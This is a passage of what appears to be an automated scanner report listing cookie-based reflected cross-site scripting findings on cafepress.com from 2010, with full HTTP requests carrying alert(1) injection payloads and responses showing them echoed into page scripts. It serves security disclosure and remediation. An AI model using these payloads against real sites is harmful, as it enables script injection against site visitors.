The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47b5e</script><script>alert(1)</script>c56a41dcd4d was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+coasters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=47b5e</script><script>alert(1)</script>c56a41dcd4d ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 59305 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59305 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '47b5e</script><script>alert(1)</script>c56a41dcd4d ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.30. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+eat_sleep_game_light_tshirt,299007536
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbfc3"-alert(1)-"de6154bb2da was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAbbfc3"-alert(1)-"de6154bb2da ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 93266 Date: Sun, 26 Dec 2010 13:49:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=801deb16c59ee3f96b4c4bec; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:57 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93266 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAbbfc3"-alert(1)-"de6154bb2da "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.31. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+eat_sleep_game_light_tshirt,299007536
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58edd</script><script>alert(1)</script>b17bfa61193 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=58edd</script><script>alert(1)</script>b17bfa61193 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 93292 Date: Sun, 26 Dec 2010 13:49:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=801deb16c59ee3f96b4c4bec; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:54 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:54 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93292 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'ProductDetails' window.cafepress.tealeaf.searchTerm = '58edd</script><script>alert(1)</script>b17bfa61193 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.32. http://www.cafepress.com/+framed-prints [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+framed-prints
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4dfd"-alert(1)-"012c3a7120a was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+framed-prints HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAd4dfd"-alert(1)-"012c3a7120a ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 63755 Date: Sun, 26 Dec 2010 13:48:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:46 GMT; path=/ Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:46 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 63755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd4dfd"-alert(1)-"012c3a7120a "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.33. http://www.cafepress.com/+framed-prints [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+framed-prints
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93d2c</script><script>alert(1)</script>063b6447c14 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+framed-prints HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=93d2c</script><script>alert(1)</script>063b6447c14 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 63777 Date: Sun, 26 Dec 2010 13:48:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/ Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:44 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 63777 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '93d2c</script><script>alert(1)</script>063b6447c14 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.34. http://www.cafepress.com/+greeting_cards [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+greeting_cards
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61088"-alert(1)-"7f0a7ca94f0 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+greeting_cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 